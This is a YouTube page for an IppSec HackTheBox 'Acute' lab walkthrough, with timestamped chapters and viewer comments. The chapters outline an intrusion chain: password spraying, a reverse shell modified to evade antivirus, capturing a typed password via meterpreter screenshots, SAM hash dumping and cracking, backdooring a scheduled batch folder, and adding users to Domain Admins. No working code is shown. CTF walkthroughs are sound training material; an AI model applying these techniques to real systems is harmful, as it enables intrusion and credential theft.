HackTheBox - Acute
Вставка
- Опубліковано 25 чер 2024
- 00:00 - Intro
01:00 - Start of nmap, the Server Header changes based upon DNS
04:00 - Navigating to the website, discovering the "New Starter Form" which has some key information like a welcome password and username convention
07:00 - Password spraying the Powershell Web Access (PSWA), discovering a valid credential but wrong host, word document had another host which is valid for edavies
09:15 - Playing around in the PSWA
10:00 - Looking at hidden files, discovering c:\utils\desktop.ini which states its a directory that is excluded by AV
12:00 - Making the mistake of running WinPEAS inside the PSWA
14:45 - Setting up ConPtyShell to get a proper PTY reverse shell on windows
15:40 - Making some light modifications to ConPtyShell in order to evade antivirus
16:50 - Getting the ConPtyShell and showing the colors/tab autocomplete
19:30 - Running WinPEAS to show another user is logged on (and the AV Exclusions)
21:55 - Switching to Metasploit, because it makes it easier to migrate into an interactive process, which allows us access to view the desktop of the logged in user
24:30 - Using Screenshot and Screenshare inside of meterpreter to record the screen and get a password that was typed onto a terminal (imonks)
29:00 - Creating a credential object with imonks, so we can Invoke-Command on the domain controller
31:00 - When specifying the correct configurationname our enter-pssession fails because we can't run measure-object. Running Get-Command and Get-Alias to view what commands we can run
35:00 - Discovering wm.ps1, which we can modify to get a shell as jmorgan on our desktop
40:00 - Creating a powershell one-liner to replace a string in a file with cat and set-content
44:40 - Screwed up our fail because of a random line break. Playing around with it until we can fix it.
47:30 - Shell returned as JMorgan, dumping the SAM/SYSTEM files and cracking local passwords on the workstation
58:30 - Looking at other Domain Users, attempting to password spray the users we don't have in order to see if there's password re-use between local desktop and domain
1:02:00 - We are awallace on the Domain Controller, getting a reverse shell
1:06:00 - Discovering c:\Program Files\KeepMeOn, which is executing .bat files every 5 minutes. Putting our powershell one liner in there and getting a shell as lhopkins
1:11:25 - Shell as lhopkins, but still not domain administrator running bloodhound
1:21:40 - Going over the Bloodhound Data
1:23:40 - Adding edavies to the Site_Admin group
1:32:50 - Adding imonks to the Site_admin group, then andding ippsec to domain admins
Great box for lateral movement. Your command line in windows is something to aspire for. You just really know so much. Thanks for your videos. They are great lessons.
I really hate the fact that when ever i watch ippsec... I feel like an Indestructible hacker, get so pumped that i go for a Insane box... Only to find out that it beats me so bad that i end up even forgetting nmap flags 😢😪.
i love your thinking, how you go back and fourth to get to the solution. its how we all would like to thing but struggle to get the next step. while its all what all should we thinking or troubleshooting. i mean the tools are there and you now them but when you in the zone then they all disappear. awesome as always!!
The fun part I did was, instead of just relaying commands with JMorgan's creds, I decrypted them. I also escaped and attained a proper reverse powershell with imonks which made it a lot easier in later steps. And finally, instead of SAM hash spraying, I went ahead and cracked the SAM hash, for AWallace.
I liked this box a lot, I pwned it in a slightly different way
@@Fbarrett ATTENTION EVERYONE: We have a c00l kid fl@m3r who likes to debbie downer others on the int3rn3t. What a let down :)
which way?
I think you could have added lhopkins to site_admins and got your shell again. I might be mistaken tho, I didn't do this box. 'Search' is very similar if you remember that one. It had the PowerShell Web Console and the compromised user had GenericAll over a member of Domain Admins.
edit: nvm, i get your logic now
Great content, got question on 16:04 cant find any info about this command in vi
:%s/ConPtyShell/ip its something about string ?
Replaces all occurrences of a string with another string
@@masterman1502 thx
Hey @ippsec at 37:00 what RLRat shell are you talking about ? I tried google to look for something similar, but could not find it. Could you please paste the name, or github link to that ? Great content as always. :)
I think he said RLWRAP
🤩
Was someone able to rdp the box? I got a Certificate failure.
Thanks
does anybody know which Firefox version is ippsec using here?
I don't like the latest version's UI and i want to revert it back to this version.
Try 89 or 79, don't remember which one was the last before UI update
@@masterman1502 Got it. it was Firefox v88 .
It’s a really bad idea (security wise) to run old versions of browsers. I thought someone that watches ippsec vids should know better.
Ippsec probably has the ESR version of Firefox. This extended release version is default in Debian/Kali.
You can also disable the new UI via about:config. Search for “Firefox disable proton” for more info.
Type in about:config. Then set all these settings to “false”:
browser.proton.enabled, browser.proton.modals.enabled, browser.proton.doorhangers.enabled, browser.proton.contextmenus.enabled.
@@serviceaccount5292 I do use Firefox ESR btw. Using a Stable Browser version in my Personal Computer isn't unsafe as long as i know how stuff works. I don't run a server from my PC.
Push!
this was big 🙃🙃🙃
fr i need to learn vi commands and powershell
i hate it. it’s like asmr
since you have a shell as lhopkins why you didn't simply add lhopkins to site_admine and read the root.txt?
I failed miserably on Acute and was not able to finish. Great work IppSec. ❤🔥🚒💟